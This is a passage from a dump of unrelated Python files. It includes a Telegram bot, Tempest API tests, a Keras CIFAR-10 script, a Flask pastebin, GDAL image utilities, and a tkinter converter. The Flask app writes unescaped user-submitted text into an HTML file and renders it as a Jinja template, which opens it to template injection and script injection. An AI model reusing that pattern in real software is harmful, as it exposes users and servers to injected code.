time.localtime(last_time)))\n elif cmd == '/lastrun':\n bot.sendMessage(chat_id=chat_id,\n text='Last run was at: %s' % time.strftime('%H:%M:%S', time.localtime(last_time)))\n elif cmd.startswith('/rand'):\n randomize(cmd, chat_id)\n elif cmd.startswith('/add'):\n operation(cmd, chat_id, 'ADD_MOVIE')\n elif cmd.startswith('/remove'):\n operation(cmd, chat_id, 'REMOVE_MOVIE')\n elif cmd == '/list':\n list = get_text_from_file(MOVIES)\n if len(list) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your movie list:\\n%s' % list)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your movie list is empty')\n else:\n bot.sendMessage(chat_id=chat_id, text='Got it.')\n\n\ndef operation(cmd, chat_id, type):\n arg = ''\n if len(cmd.split(' ', 1)) > 1:\n arg = cmd.split(' ', 1)[1].strip()\n if len(arg) > 0:\n if type == 'ADD_FILTER':\n FILTER.append(arg)\n bot.sendMessage(chat_id=chat_id, text='Added temp filter: %s' % arg)\n elif type == 'BAN' and save_to_file(BANNED_FILE, arg):\n BANNED.append(arg)\n bot.sendMessage(chat_id=chat_id, text='Added to ban list: %s' % arg)\n elif type == 'ADD_MOVIE' and save_to_file(MOVIES, arg):\n bot.sendMessage(chat_id=chat_id, text='Added film: %s' % arg)\n elif type == 'REMOVE_MOVIE' and delete_from_file(MOVIES, arg):\n bot.sendMessage(chat_id=chat_id, text='Removed film: %s' % arg)\n else:\n bot.sendMessage(chat_id=chat_id, text='Sorry couldn\\'t do that.')\n\n\ndef show_filters(chat_id):\n filters = ''\n for item in FILTER:\n try:\n filters = filters + '%s\\n' % item.decode('utf-8')\n except Exception:\n filters = filters + '%s\\n' % item\n if len(filters) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your notifications filter list:\\n%s' % filters)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your filter list is empty')\n\n\ndef randomize(cmd, chat_id):\n try:\n list = cmd.split(' ')\n a, b = int(list[1]), int(list[2])\n bot.sendMessage(chat_id=chat_id, text=random.randint(a, b))\n except Exception:\n bot.sendMessage(chat_id=chat_id, text='Encountered an error. Sorry.')\n\n\ndef save_to_file(file, arg):\n try:\n with codecs.open(file, 'a', 'utf-8') as f:\n f.write(arg + '\\n')\n return True\n except IOError:\n return False\n\n\ndef delete_from_file(file, arg):\n try:\n with codecs.open(file, 'r+') as f:\n d = f.readlines()\n f.seek(0)\n for i in d:\n if i.rstrip('\\n') != arg:\n f.write(i)\n f.truncate()\n f.close()\n return True\n except IOError:\n return False\n\nif __name__ == '__main__':\n main()\n","sub_path":"telegram-bot.py","file_name":"telegram-bot.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"479541416","text":"# -*- coding: utf-8 -*-\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport six\n\nfrom tempest_lib import exceptions as lib_exc\n\nfrom tempest.api.infra_optim.admin import base\nfrom tempest import test\n\n\nclass TestAuditTemplate(base.BaseInfraOptimTest):\n \"\"\"Tests for audit_template.\"\"\"\n\n @classmethod\n def resource_setup(cls):\n super(TestAuditTemplate, cls).resource_setup()\n _, cls.audit_template = cls.create_audit_template()\n\n def _assertExpected(self, expected, actual):\n # Check if not expected keys/values exists in actual response body\n for key, value in six.iteritems(expected):\n if key not in ('created_at', 'updated_at', 'deleted_at'):\n self.assertIn(key, actual)\n self.assertEqual(value, actual[key])\n\n @test.attr(type='smoke')\n def test_create_audit_template(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'str': 'value', 'int': 123, 'float': 0.123,\n 'bool': True, 'list': [1, 2, 3],\n 'dict': {'foo': 'bar'}}}\n\n _, body = self.create_audit_template(**params)\n self._assertExpected(params, body['properties'])\n\n _, audit_template = self.client.show_audit_template(body['uuid'])\n self._assertExpected(audit_template, body)\n\n @test.attr(type='smoke')\n def test_create_audit_template_unicode_description(self):\n # Use a unicode string for testing:\n params = {'name': 'my at name',\n 'description': 'my àt déscrïptïôn',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'foo': 'bar'}}\n\n _, body = self.create_audit_template(**params)\n self._assertExpected(params, body['properties'])\n\n _, audit_template = self.client.show_audit_template(body['uuid'])\n self._assertExpected(audit_template, body)\n\n @test.attr(type='smoke')\n def test_show_audit_template(self):\n _, audit_template = self.client.show_audit_template(\n self.audit_template['uuid'])\n self._assertExpected(self.audit_template, audit_template)\n\n @test.attr(type='smoke')\n def test_show_audit_template_by_goal(self):\n _, audit_template = self.client.\\\n show_audit_template_by_goal(self.audit_template['goal'])\n self._assertExpected(self.audit_template,\n audit_template['audit_templates'][0])\n\n @test.attr(type='smoke')\n def test_show_audit_template_by_host_aggregate(self):\n _, audit_template = self.client.\\\n show_audit_template_by_host_aggregate(\n self.audit_template['host_aggregate'])\n self._assertExpected(self.audit_template,\n audit_template['audit_templates'][0])\n\n @test.attr(type='smoke')\n def test_show_audit_template_with_links(self):\n _, audit_template = self.client.show_audit_template(\n self.audit_template['uuid'])\n self.assertIn('links', audit_template.keys())\n self.assertEqual(2, len(audit_template['links']))\n self.assertIn(audit_template['uuid'],\n audit_template['links'][0]['href'])\n\n @test.attr(type=\"smoke\")\n def test_list_audit_templates(self):\n _, body = self.client.list_audit_templates()\n self.assertIn(self.audit_template['uuid'],\n [i['uuid'] for i in body['audit_templates']])\n # Verify self links.\n for audit_template in body['audit_templates']:\n self.validate_self_link('audit_templates', audit_template['uuid'],\n audit_template['links'][0]['href'])\n\n @test.attr(type='smoke')\n def test_list_with_limit(self):\n _, body = self.client.list_audit_templates(limit=3)\n\n next_marker = body['audit_templates'][-1]['uuid']\n self.assertIn(next_marker, body['next'])\n\n @test.attr(type='smoke')\n def test_delete_audit_template(self):\n _, body = self.create_audit_template()\n uuid = body['uuid']\n\n self.delete_audit_template(uuid)\n self.assertRaises(lib_exc.NotFound, self.client.show_audit_template,\n uuid)\n\n @test.attr(type='smoke')\n def test_update_audit_template_replace(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL',\n 'extra': {'key1': 'value1', 'key2': 'value2'}}\n\n _, body = self.create_audit_template(**params)\n\n new_name = 'my at new name'\n new_description = 'my new at description'\n new_host_aggregate = 10\n new_goal = 'A NEW GOAL'\n new_extra = {'key1': 'new-value1', 'key2': 'new-value2'}\n\n patch = [{'path': '/name',\n 'op': 'replace',\n 'value': new_name},\n {'path': '/description',\n 'op': 'replace',\n 'value': new_description},\n {'path': '/host_aggregate',\n 'op': 'replace',\n 'value': new_host_aggregate},\n {'path': '/goal',\n 'op': 'replace',\n 'value': new_goal},\n {'path': '/extra/key1',\n 'op': 'replace',\n 'value': new_extra['key1']},\n {'path': '/extra/key2',\n 'op': 'replace',\n 'value': new_extra['key2']}]\n\n self.client.update_audit_template(body['uuid'], patch)\n\n _, body = self.client.show_audit_template(body['uuid'])\n self.assertEqual(new_name, body['name'])\n self.assertEqual(new_description, body['description'])\n self.assertEqual(new_host_aggregate, body['host_aggregate'])\n self.assertEqual(new_goal, body['goal'])\n self.assertEqual(new_extra, body['extra'])\n\n @test.attr(type='smoke')\n def test_update_audit_template_remove(self):\n extra = {'key1': 'value1', 'key2': 'value2', 'key3': 'value3'}\n description = 'my at description'\n goal = 'A GOAL'\n name = 'my at name'\n params = {'name': name,\n 'description': description,\n 'host_aggregate': 12,\n 'goal': goal,\n 'extra': extra}\n\n _, audit_template = self.create_audit_template(**params)\n\n # Removing one item from the collection\n self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/extra/key2', 'op': 'remove'}])\n\n extra.pop('key2')\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual(extra, body['extra'])\n\n # Removing the collection\n self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/extra', 'op': 'remove'}])\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual({}, body['extra'])\n\n # Removing the Host Aggregate ID\n self.client.update_audit_template(\n audit_template['uuid'],\n [{'path': '/host_aggregate', 'op': 'remove'}])\n _, body = self.client.show_audit_template(audit_template['uuid'])\n self.assertEqual('', body['extra'])\n\n # Assert nothing else was changed\n self.assertEqual(name, body['name'])\n self.assertEqual(description, body['description'])\n self.assertEqual(goal, body['goal'])\n\n @test.attr(type='smoke')\n def test_update_audit_template_add(self):\n params = {'name': 'my at name',\n 'description': 'my at description',\n 'host_aggregate': 12,\n 'goal': 'A GOAL'}\n\n _, body = self.create_audit_template(**params)\n\n extra = {'key1': 'value1', 'key2': 'value2'}\n\n patch = [{'path': '/extra/key1',\n 'op': 'add',\n 'value': extra['key1']},\n {'path': '/extra/key2',\n 'op': 'add',\n 'value': extra['key2']}]\n\n self.client.update_audit_template(body['uuid'], patch)\n\n _, body = self.client.show_audit_template(body['uuid'])\n self.assertEqual(extra, body['extra'])\n\n @test.attr(type='smoke')\n def test_audit_template_audit_list(self):\n _, audit = self.create_audit(self.audit_template['uuid'])\n _, body = self.client.list_audit_template_audits(\n self.audit_template['uuid'])\n self.assertIn(audit['uuid'], [n['uuid'] for n in body['audits']])\n","sub_path":"watcher/contrib/tempest/tempest/api/infra_optim/admin/test_audit_template.py","file_name":"test_audit_template.py","file_ext":"py","file_size_in_byte":9271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"282228388","text":"# CIFAR-10은 총 10개의 레이블로 이루어진 6만장의 칼라 이미지를 가지며 5만장은 트레이닝, 1만장은 테스트 용\n# 10가지 클래스를 담고 있다.\n# airplane, automobile, bird, cat, deer, dog, frog, horse, ship, truck\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.layers import Input, Flatten, Dense, Conv2D\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.datasets import cifar10\n\nNUM_CLASSES = 10\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\nprint (\"Training data:\")\nprint (\"Number of examples: \", x_train.shape[0])\nprint (\"Number of channels:\",x_train.shape[3]) \nprint (\"Image size:\", x_train.shape[1], x_train.shape[2])\nprint (\"Test data:\")\nprint (\"Number of examples:\", x_test.shape[0])\nprint (\"Number of channels:\", x_test.shape[3])\nprint (\"Image size:\", x_test.shape[1], x_test.shape[2]) \nprint(x_train.shape, x_train.dtype)\n # Training data:\n # Number of examples: 50000\n # Number of channels: 3\n # Image size: 32 32\n # Test data:\n # Number of examples: 10000\n # Number of channels: 3\n # Image size: 32 32\n # (50000, 32, 32, 3) uint8\n\n# print(x_train[0]) #[[[ 59 62 63] [ 43 46 45] ...\n# print(y_train[0]) #[6]\n\nplt.figure(figsize=(12,4))\nplt.subplot(131) # 1행 3열 중 1열 \nplt.imshow(x_train[0], interpolation=\"bicubic\")\nplt.subplot(132)\nplt.imshow(x_train[1], interpolation=\"bicubic\")\nplt.subplot(133)\nplt.imshow(x_train[2], interpolation=\"bicubic\")\nplt.show()\n\nx_train = x_train.astype('float32') / 255.0\nx_test = x_test.astype('float32') / 255.0\n\ny_train = to_categorical(y_train, NUM_CLASSES)\ny_test = to_categorical(y_test, NUM_CLASSES)\nprint(x_train[54, 12, 13, 1]) # 0.36862, 인덱스 54의 이미지에서 (12, 13) 위치에 해당하는 픽셀의 초록 채널 값을 의미\n\n# architecture -- Sequential model 이용(CNN X)\n# model = Sequential([\n# Dense(200, activation='relu', input_shape = (32, 32, 3)),\n# Flatten(),\n# Dense(150, activation='relu'),\n# Dense(NUM_CLASSES, activation='softmax'),\n# ])\n# print(model.summary())\n\n# architecture -- function API 이용\ninput_layer = Input((32,32,3))\nx = Flatten()(input_layer)\nx = Dense(200, activation = 'relu')(x)\nx = Dense(150, activation = 'relu')(x)\noutput_layer = Dense(NUM_CLASSES, activation = 'softmax')(x)\nmodel = Model(input_layer, output_layer)\nprint(model.summary())\n\n# train\nopt = Adam(lr=0.01)\nmodel.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])\n\nmodel.fit(x_train, y_train, batch_size=128, epochs=10, shuffle=True, verbose=2)\nprint('test acc : %.4f'%(model.evaluate(x_test, y_test, verbose=0, batch_size=128)[1]))\nprint('test loss : %.4f'%(model.evaluate(x_test, y_test, verbose=0, batch_size=128)[0]))\n\nprint()\nCLASSES = np.array(['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'])\n\npred = model.predict(x_test[:10])\npred_single = CLASSES[np.argmax(pred, axis = -1)]\nactual_single = CLASSES[np.argmax(y_test[:10], axis = -1)]\nprint('예측값 : ', pred_single)\nprint('실제값 : ', actual_single)\n # 예측값 : ['dog' 'truck' 'ship' 'airplane' 'frog' 'frog' 'frog' 'frog' 'dog' 'ship']\n # 실제값 : ['cat' 'ship' 'ship' 'airplane' 'frog' 'frog' 'automobile' 'frog' 'cat' 'automobile']\nprint('분류 실패 수 : ', (pred_single != actual_single).sum())\n\n# 시각화\nfig = plt.figure(figsize=(15, 3))\nfig.subplots_adjust(hspace=0.4, wspace=0.4)\n\nfor i, idx in enumerate(range(len(x_test[:10]))):\n img = x_test[idx]\n ax = fig.add_subplot(1, len(x_test[:10]), i + 1)\n ax.axis('off')\n ax.text(0.5, -0.35, 'pred = ' + str(pred_single[idx]), \\\n fontsize=10, ha='center', transform=ax.transAxes) \n ax.text(0.5, -0.7, 'act = ' + str(actual_single[idx]), \\\n fontsize=10, ha='center', transform=ax.transAxes)\n ax.imshow(img)\nplt.show()","sub_path":"Python/py_tensorflow/pack/tf03/ke_ex22cifar.py","file_name":"ke_ex22cifar.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"223507489","text":"import hashlib\nimport datetime as dt\nimport os\nimport MySQLdb\nimport variables\nfrom pygments import lexers\nfrom pygments.formatters import get_all_formatters\nfrom pygments.formatters.html import HtmlFormatter\nfrom pygments import highlight\nimport CheckingExpiry\nfrom datetime import datetime\nfrom flask import abort\nfrom flask import Flask, redirect, url_for, request, render_template\n\nformat = '%Y-%m-%d %H:%M:%S'\n\napp = Flask(__name__)\nuser_data = None\nfilename = None\ntimelimit=None\nlexername=None\n\n@app.route('/')\ndef index():\n return render_template('test1.html')\n\n\ndef filetest():\n global user_data, filename, timelimit, lexername\n formatter = HtmlFormatter(linenos=True, style=\"monokai\")\n lex = lexers.get_lexer_by_name(lexername)\n code=highlight(user_data, lex, formatter)\n path = '/home/pavan/PycharmProjects/example2/templates/' + filename\n Html_file = open(path, \"w\")\n Html_file.write(\"\"\"\n \n \n \n \n Pasteit\n \n \n \n \n \n
\n \"\"\")\n Html_file.write(\"{0}\".format(code))\n Html_file.write(\"\"\"
\"\"\")\n Html_file.write(\"{0}\".format(variables.str))\n Html_file.write(\"{0}\".format(user_data))\n Html_file.write(\"\"\"

\n \n \n \n \"\"\")\n Html_file.close()\n now = datetime.strptime(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), format)\n expire = now+dt.timedelta(seconds=int(timelimit))\n #print(timelimit)\n CheckingExpiry.ins(now, expire, path)\n\n return render_template('%s' %filename )\n\n\n@app.route('/success/')\ndef success(name):\n global filename, timelimit\n filename = name + \".html\"\n path = '/home/pavan/PycharmProjects/example2/templates/'+filename\n CheckingExpiry.checkdata(path)\n if os.path.isfile(path):\n return render_template('%s' %filename )\n else:\n return abort(404)\n\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n global user_data, filename, timelimit, lexername\n user_data=None\n userdata = None\n if request.method == 'POST':\n timelimit=request.form['expires']\n lexername = request.form['lexer']\n userdata = request.form['nm']\n user_data=userdata\n hash = hashlib.sha1(str(dt.datetime.now()).encode(\"UTF-8\")).hexdigest()\n filename = hash[:8] + \".html\"\n filetest()\n return redirect(url_for('success', name=hash[:8]))\n\n else:\n userdata = request.args.get('nm')\n return redirect(url_for('success', name=userdata))\n\nif __name__ == '__main__':\n app.run(debug = True)\n\n\n","sub_path":"example2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542381531","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 20:47:17 2018\n\n@author: shubhamsinha\n\"\"\"\nimport numpy as np\nfrom numpy import mgrid, sum\n\n\ndef extractfeatures(image):\n x, y = mgrid[:image.shape[0],:image.shape[1]]\n moments = {}\n moments['mean_x'] = sum(x*image)/sum(image)\n moments['mean_y'] = sum(y*image)/sum(image)\n \n # raw or spatial moments\n moments['m00'] = sum(image)\n moments['m01'] = sum(x*image)\n moments['m10'] = sum(y*image)\n moments['m11'] = sum(y*x*image)\n moments['m02'] = sum(x**2*image)\n moments['m20'] = sum(y**2*image)\n moments['m12'] = sum(x*y**2*image)\n moments['m21'] = sum(x**2*y*image)\n moments['m03'] = sum(x**3*image)\n moments['m30'] = sum(y**3*image)\n \n # central moments\n # moments['mu01']= sum((y-moments['mean_y'])*image) # should be 0\n # moments['mu10']= sum((x-moments['mean_x'])*image) # should be 0\n moments['mu11'] = sum((x-moments['mean_x'])*(y-moments['mean_y'])*image)\n moments['mu02'] = sum((y-moments['mean_y'])**2*image) # variance\n moments['mu20'] = sum((x-moments['mean_x'])**2*image) # variance\n moments['mu12'] = sum((x-moments['mean_x'])*(y-moments['mean_y'])**2*image)\n moments['mu21'] = sum((x-moments['mean_x'])**2*(y-moments['mean_y'])*image) \n moments['mu03'] = sum((y-moments['mean_y'])**3*image) \n moments['mu30'] = sum((x-moments['mean_x'])**3*image) \n\n feature=np.zeros((10),dtype=int)\n feature[0]=moments['mean_x']\n feature[1]=moments['mean_y']\n feature[2]=moments['m00']\n feature[3]=moments['mu11']\n feature[4]=moments['mu02']\n feature[5]=moments['mu20']\n feature[6]=moments['mu12']\n feature[7]=moments['mu21']\n feature[8]=moments['mu03']\n feature[9]=moments['mu30']\n \n return feature\n","sub_path":"facedata/extractfeature.py","file_name":"extractfeature.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536421319","text":"'''\nCopyright 2015 Planet Labs, Inc.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\nimport logging\nfrom collections import namedtuple\n\nimport numpy\nfrom osgeo import gdal, gdal_array\n\n# In-memory geospatial image\n# Bands: list of uint16 numpy arrays, each holding a band of data\n# Alpha: uint16 numpy array holding the alpha information\n# Metadata: dict containing georeferencing information\n# (geotransform, projection, rpc)\nGImage = namedtuple('GImage', 'bands, alpha, metadata')\n\n\ndef save(gimage, filename, nodata=None, compress=True):\n gdal_ds = create_ds(gimage, filename, compress)\n save_to_ds(gimage, gdal_ds, nodata)\n\n\ndef create_ds(gimage, filename, compress):\n # Alpha is saved as the last band\n band_count = len(gimage.bands) + 1\n options = ['ALPHA=YES']\n\n if band_count == 4:\n options.append('PHOTOMETRIC=RGB')\n\n if compress:\n options.append('COMPRESS=DEFLATE')\n options.append('PREDICTOR=2')\n\n datatype = gdal.GDT_UInt16\n ysize, xsize = gimage.bands[0].shape\n gdal_ds = gdal.GetDriverByName('GTIFF').Create(\n filename, xsize, ysize, band_count, datatype,\n options=options)\n return gdal_ds\n\n\ndef save_to_ds(gimage, gdal_ds, nodata=None):\n assert gdal_ds.RasterCount == len(gimage.bands) + 1\n assert gdal_ds.RasterXSize == gimage.bands[0].shape[1]\n assert gdal_ds.RasterYSize == gimage.bands[0].shape[0]\n\n for i, band in enumerate(gimage.bands):\n gdal_array.BandWriteArray(\n gdal_ds.GetRasterBand(i + 1), band)\n if nodata is not None:\n gdal_ds.GetRasterBand(i + 1).SetNoDataValue(nodata)\n\n alpha_band = gdal_ds.GetRasterBand(gdal_ds.RasterCount)\n gdal_array.BandWriteArray(alpha_band, gimage.alpha)\n\n # Save georeferencing information\n if 'projection' in gimage.metadata.keys():\n gdal_ds.SetProjection(gimage.metadata['projection'])\n if 'geotransform' in gimage.metadata.keys():\n gdal_ds.SetGeoTransform(gimage.metadata['geotransform'])\n if 'rpc' in gimage.metadata.keys():\n gdal_ds.SetMetadata(gimage.metadata['rpc'], 'RPC')\n\n\ndef load(filename, nodata=None):\n logging.debug(\"Loading {} as GImage.\".format(filename))\n gdal_ds = gdal.Open(filename)\n if gdal_ds is None:\n raise Exception('Unable to open file \"{}\" with gdal.Open()'.format(\n filename))\n\n alpha, band_count = _read_alpha_and_band_count(gdal_ds)\n bands = _read_all_bands(gdal_ds, band_count)\n metadata = _read_metadata(gdal_ds)\n\n if nodata is not None:\n alpha = alpha * _nodata_to_mask(bands, nodata)\n return GImage(bands, alpha, metadata)\n\n\ndef _read_metadata(gdal_ds):\n metadata = {}\n\n default_geotransform = (-1.0, 1.0, 0.0, 1.0, 0.0, -1.0)\n geotransform = gdal_ds.GetGeoTransform()\n if geotransform == default_geotransform:\n logging.info(\"Raster has default geotransform, not storing.\")\n else:\n metadata['geotransform'] = geotransform\n\n projection = gdal_ds.GetProjection()\n if projection == '':\n logging.info(\"Raster has no projection information, not storing.\")\n else:\n metadata['projection'] = gdal_ds.GetProjection()\n\n rpc = gdal_ds.GetMetadata('RPC')\n if rpc == {}:\n logging.info(\"Raster has no rpc information, not storing.\")\n else:\n metadata['rpc'] = rpc\n return metadata\n\n\ndef _read_all_bands(gdal_ds, band_count):\n bands = []\n for band_n in range(1, band_count + 1):\n bands.append(_read_single_band(gdal_ds, band_n))\n return bands\n\n\ndef _read_single_band(gdal_ds, band_no):\n ''' band_no is gdal style band numbering, i.e. from 1 onwards not 0 indexed\n '''\n band = gdal_ds.GetRasterBand(band_no)\n array = band.ReadAsArray()\n if array is None:\n raise Exception(\n 'GDAL error occured : {}'.format(gdal.GetLastErrorMsg()))\n return array.astype(numpy.uint16)\n\n\ndef _read_alpha_and_band_count(gdal_ds):\n logging.debug(\"Loading alpha. Initial band count: {}\".format(\n gdal_ds.RasterCount))\n last_band = gdal_ds.GetRasterBand(gdal_ds.RasterCount)\n if last_band.GetColorInterpretation() == gdal.GCI_AlphaBand:\n alpha = last_band.ReadAsArray()\n logging.debug(\"Alpha band found, reducing band count\")\n band_count = gdal_ds.RasterCount - 1\n else:\n alpha = 65535 * numpy.ones(\n (gdal_ds.RasterYSize, gdal_ds.RasterXSize),\n dtype=numpy.uint16)\n band_count = gdal_ds.RasterCount\n return alpha, band_count\n\n\ndef _nodata_to_mask(bands, nodata):\n alpha = numpy.ones(bands[0].shape, dtype=numpy.uint16)\n for band in bands:\n alpha[band == nodata] = 0\n return alpha\n\n\ndef check_comparable(gimages, check_metadata=False):\n '''Checks that the gimages have the same number of bands, band dimensions,\n and, optionally, geospatial metadata'''\n\n no_bands = len(gimages[0].bands)\n band_shape = gimages[0].bands[0].shape\n metadata = gimages[0].metadata\n\n logging.debug('Initial image - band number, band shape: {}, {}'.format(\n no_bands, band_shape))\n logging.debug('Initial image metadata: '.format(metadata))\n\n for i, image in enumerate(gimages[1:]):\n if len(image.bands) != no_bands:\n raise Exception(\n 'Image {} has a different number of bands: '\n '{} (initial: {})'.format(i + 1, len(image.bands), no_bands))\n\n if image.bands[0].shape != band_shape:\n raise Exception(\n 'Image {} has a different band shape: {} (initial: {})'.format(\n i + 1, image.bands[0].shape, band_shape))\n\n if check_metadata and image.metadata != metadata:\n raise Exception(\n 'Image {} has different geographic metadata: {} '\n '(initial: {})'.format(i + 1, image.metadata, metadata))\n\n\ndef check_equal(gimages, check_metadata=False):\n '''Checks that the gimages are equavalent'''\n\n check_comparable(gimages, check_metadata)\n\n first_gimg = gimages[0]\n for i, image in enumerate(gimages[1:]):\n numpy.testing.assert_equal(first_gimg.bands, image.bands,\n err_msg='Image {} has different band data'\n ' to the first image'.format(i))\n\n numpy.testing.assert_equal(first_gimg.alpha, image.alpha,\n err_msg='Image {} has different alpha data'\n ' to the first image'.format(i))\n","sub_path":"radiometric_normalization/gimage.py","file_name":"gimage.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"645970058","text":"import tkinter\n\nwindow = tkinter.Tk()\nwindow.title(\"My first GUI Program\")\n# window.minsize(width=500, height=300)\nwindow.config(padx=20, pady=20)\n\nmile_label = tkinter.Label(text=\"Miles\", font=(\"Arial\", 10, \"bold\"))\nmile_label.grid(column=2, row=0)\n# Label\neqal_label = tkinter.Label(text=\"is equal to \", font=(\"Arial\", 10, \"bold\"))\neqal_label.grid(column=0, row=1)\n\ncalculate_label = tkinter.Label(text=\"0\", font=(\"Arial\", 10, \"bold\"))\ncalculate_label.grid(column=1, row=1)\ncalculate_label.config(padx=50)\n\nkm_label = tkinter.Label(text=\"Km\", font=(\"Arial\", 10, \"bold\"))\nkm_label.grid(column=2, row=1)\n\n\ndef button_clicked():\n calculate = round(float(input.get()) / 0.62137, 2)\n calculate_label[\"text\"] = calculate\n calculate_label.grid(column=1, row=1)\n\n\n# Botton\ncalculate_button = tkinter.Button(text=\"Calculate\", command=button_clicked)\ncalculate_button.grid(column=1, row=2)\n\n# new_button = tkinter.Button(text=\"New Button\", command=button_clicked)\n# new_button.grid(column=2, row=0)\n# #Entry\ninput = tkinter.Entry(text=\"0\", width=10)\ninput.get()\ninput.grid(column=1, row=0)\n\nwindow.mainloop()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494883710","text":"import argparse\nimport pickle as pkl\nimport os\nfrom os.path import join, exists\nfrom types import SimpleNamespace\n\nimport torch\nfrom train_abstractor import prep_trainer as abs_prep_trainer\nfrom train_extractor_ml import prep_trainer as exs_prep_trainer\nfrom utils import make_vocab, make_embedding\n\ntry:\n DATA_DIR = os.environ['DATA']\nexcept KeyError:\n print('please use environment variable to specify datadirectories')\n\ndef main(args):\n with open(join(DATA_DIR, 'vocab_cnt.pkl'), 'rb') as f:\n wc = pkl.load(f)\n word2id = make_vocab(wc, args.vsize)\n\n abs_args = SimpleNamespace(\n **vars(args),\n path='./uni_pretrained_abstractor',\n w2v='./word_vectors/word2vec.128d.226k.bin',\n n_layer=1,\n n_hidden=256,\n max_art=100,\n max_abs=30,\n )\n abs_trainer, abs_net = abs_prep_trainer(abs_args, word2id=word2id)\n\n exs_args = SimpleNamespace(\n **vars(args),\n path='./uni_pretrained_extractor',\n w2v=None, # no embedding since reuse abs's encoder\n net_type='rnn',\n lstm_layer=1,\n lstm_hidden=256,\n max_word=100,\n max_sent=60\n )\n\n exs_trainer, _ = exs_prep_trainer(exs_args, word2id=word2id, encoder=abs_net.encoder)\n\n # training generator\n exs_train_gen = exs_trainer.train_gen('extractor')\n abs_train_gen = abs_trainer.train_gen('abstractor')\n\n for exs_end, abs_end in zip(exs_train_gen, abs_train_gen):\n if exs_end and abs_end:\n print('Uni Training End')\n break\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='training of the abstractor (ML)'\n )\n\n parser.add_argument('--vsize', type=int, action='store', default=30000,\n help='vocabulary size')\n parser.add_argument('--emb_dim', type=int, action='store', default=128,\n help='the dimension of word embedding')\n\n\n parser.add_argument('--no-bi', action='store_true',\n help='disable bidirectional LSTM encoder')\n\n # training options\n parser.add_argument('--lr', type=float, action='store', default=1e-3,\n help='learning rate')\n parser.add_argument('--decay', type=float, action='store', default=0.5,\n help='learning rate decay ratio')\n parser.add_argument('--lr_p', type=int, action='store', default=0,\n help='patience for learning rate decay')\n parser.add_argument('--clip', type=float, action='store', default=2.0,\n help='gradient clipping')\n parser.add_argument('--batch', type=int, action='store', default=32,\n help='the training batch size')\n parser.add_argument(\n '--ckpt_freq', type=int, action='store', default=3000,\n help='number of update steps for checkpoint and validation'\n )\n parser.add_argument('--patience', type=int, action='store', default=5,\n help='patience for early stopping')\n\n parser.add_argument('--debug', action='store_true',\n help='run in debugging mode')\n parser.add_argument('--no-cuda', action='store_true',\n help='disable GPU training')\n args = parser.parse_args()\n args.bi = not args.no_bi\n args.cuda = torch.cuda.is_available() and not args.no_cuda\n\n main(args)\n","sub_path":"train_uni.py","file_name":"train_uni.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"606662570","text":"from multiprocessing import Process,Lock\n\n\ndef f(l,i):\n l.acquire()\n print('hello,handsome',i)\n l.release()\n\ndef f2(i):\n print('hello,handsome2',i)\n\n\nif __name__ == '__main__':\n lock = Lock()\n for i in range(10):#加锁,防止一行为打印完,就开始打印下一行\n 